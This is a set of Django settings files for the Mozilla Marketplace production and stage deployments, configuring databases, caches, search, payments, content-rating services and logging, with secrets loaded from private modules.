RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
# ES_INDEXES doesn't change for prod.
BUILDER_UPGRADE_URL = "https://builder.addons.mozilla.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.32.124.20']
EMAIL_BLACKLIST = private.EMAIL_BLACKLIST
NEW_FEATURES = True
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
XSENDFILE_HEADER = 'X-Accel-Redirect'
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
MONOLITH_SERVER = 'https://monolith.firefox.com'
GEOIP_URL = 'http://geo.marketplace.firefox.com'
NEWRELIC_WHITELIST = ['web1.addons.phx1.mozilla.com',
'web10.addons.phx1.mozilla.com',
'web20.addons.phx1.mozilla.com',
'web1.mktweb.services.phx1.mozilla.com',
'web4.mktweb.services.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
from .. import splitstrip
import private_mkt
SERVER_EMAIL = '[email protected]'
SECRET_KEY = private_mkt.SECRET_KEY
DOMAIN = getattr(private_mkt, 'DOMAIN', 'marketplace.firefox.com')
SITE_URL = getattr(private_mkt, 'SITE_URL', 'https://' + DOMAIN)
SERVICES_URL = SITE_URL
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace.cdn.mozilla.net/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + 'img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'marketplace.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
SYSLOG_TAG = "http_app_addons_marketplace"
SYSLOG_TAG2 = "http_app_addons_marketplace_timer"
SYSLOG_CSP = "http_app_addons_marketplace_csp"
# Redis
REDIS_BACKEND = getattr(private_mkt, 'REDIS_BACKENDS_CACHE', private.REDIS_BACKENDS_CACHE)
REDIS_BACKENDS_CACHE_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_CACHE_SLAVE', private.REDIS_BACKENDS_CACHE_SLAVE)
REDIS_BACKENDS_MASTER = getattr(private_mkt, 'REDIS_BACKENDS_MASTER', private.REDIS_BACKENDS_MASTER)
REDIS_BACKENDS_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_SLAVE', private.REDIS_BACKENDS_SLAVE)
REDIS_BACKENDS = {
'cache': REDIS_BACKEND,
'cache_slave': REDIS_BACKENDS_CACHE_SLAVE,
'master': REDIS_BACKENDS_MASTER,
'slave': REDIS_BACKENDS_SLAVE,
}
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERYD_PREFETCH_MULTIPLIER = 1
LOGGING['loggers'].update({
'z.task': { 'level': logging.DEBUG },
'z.hera': { 'level': logging.INFO },
'z.redis': { 'level': logging.DEBUG },
'z.receipt': {'level': logging.ERROR },
'elasticutils': {'level': logging.INFO },
'caching': {'level': logging.ERROR },
})
STATSD_PREFIX = 'marketplace'
GRAPHITE_PREFIX = STATSD_PREFIX
CEF_PRODUCT = STATSD_PREFIX
IMPALA_BROWSE = True
IMPALA_REVIEWS = True
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
MIDDLEWARE_CLASSES = tuple(m for m in MIDDLEWARE_CLASSES if m not in (csp,))
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments.firefox.com',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
# Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace.cdn.mozilla.net']
# Bug 793876
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
CARRIER_URLS = splitstrip(private_mkt.CARRIER_URLS)
# Pass through the DSN to the Raven client and force signal
# registration so that exceptions are passed through to sentry
#RAVEN_CONFIG = {'dsn': SENTRY_DSN, 'register_signals': True}
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'addons-marketplace-prod',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# Payment settings.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
# This must match private.SECRET in webpay settings.
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
if NEWRELIC_ENABLE:
NEWRELIC_INI = '/etc/newrelic.d/marketplace.firefox.com.ini'
ES_USE_PLUGINS = True
BANGO_BASE_PORTAL_URL = 'https://mozilla.bango.com/login/al.aspx?'
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = DOMAIN
# IARC content ratings.
IARC_COMPANY = 'Mozilla'
IARC_ENV = 'prod'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCProdService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCProdRating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = False
BOKU_SIGNUP_URL = 'https://developer.mozilla.org/en-US/Marketplace/Publishing/Pricing/Providers/Boku'
PRE_GENERATE_APKS = True
PRE_GENERATE_APK_URL = 'https://controller.apk.firefox.com/application.apk'
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS += ['.mozflare.net']
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-stage'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons.allizom.org/repackage/sdk-versions/"
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_stage' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
MONOLITH_SERVER = 'https://monolith.allizom.org'
GEOIP_URL = 'http://geo.marketplace.allizom.org'
API_THROTTLE = False
NEWRELIC_WHITELIST = ['web19.stage.addons.phx1.mozilla.com',
'web20.stage.addons.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
DOMAIN = 'marketplace.allizom.org'
SERVER_EMAIL = '[email protected]'
DOMAIN = "marketplace.allizom.org"
SITE_URL = 'https://marketplace.allizom.org'
SERVICES_URL = SITE_URL
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-cdn.allizom.org/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'stage.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
LOG_LEVEL = logging.DEBUG
# The django statsd client to use, see django-statsd for more.
#STATSD_CLIENT = 'django_statsd.clients.moz_heka'
SYSLOG_TAG = "http_app_addons_marketplacestage"
SYSLOG_TAG2 = "http_app_addons_marketplacestage_timer"
SYSLOG_CSP = "http_app_addons_marketplacestage_csp"
STATSD_PREFIX = 'marketplace-stage'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://marketplace-dev.allizom.org',
'https://marketplace-altdev.allizom.org']
if getattr(private_mkt, 'LOAD_TESTING', False):
# mock the authentication and use django_fakeauth for this
AUTHENTICATION_BACKENDS = ('django_fakeauth.FakeAuthBackend',)\
+ AUTHENTICATION_BACKENDS
MIDDLEWARE_CLASSES.insert(
MIDDLEWARE_CLASSES.index('access.middleware.ACLMiddleware'),
'django_fakeauth.FakeAuthMiddleware')
FAKEAUTH_TOKEN = private_mkt.FAKEAUTH_TOKEN
# we are also creating access tokens for OAuth, here are the keys and
# secrets used for them
API_PASSWORD = getattr(private_mkt, 'API_PASSWORD', FAKEAUTH_TOKEN)
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'addons-marketplace-stage',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-stage/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Stage'
ENABLE_API_ERROR_SERVICE = True
NEWRELIC_INI = '/etc/newrelic.d/marketplace.allizom.org.ini'
ES_USE_PLUGINS = True
BANGO_BASE_PORTAL_URL = 'https://mozilla.bango.com/login/al.aspx?'
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = DOMAIN
MONOLITH_INDEX = 'mktstage-time_*'
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
PRE_GENERATE_APKS = True
PRE_GENERATE_APK_URL = \
'https://apk-controller.stage.mozaws.net/application.apk'
BOKU_SIGNUP_URL = 'https://merchants.boku.com/signup/signup_business?params=jEHWaTM7zm5cbPpheT2iS4xB1mkzO85uxVAo7rs7LVgy5JYGMWnUYDvxyEk8lxalP1pJZFv5d9oI%0A9bcXqxv0MQ%3D%3D'
########NEW FILE########
__FILENAME__ = mkt
mkt.wsgi
########NEW FILE########
__FILENAME__ = zamboni
zamboni.wsgi
########NEW FILE########
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.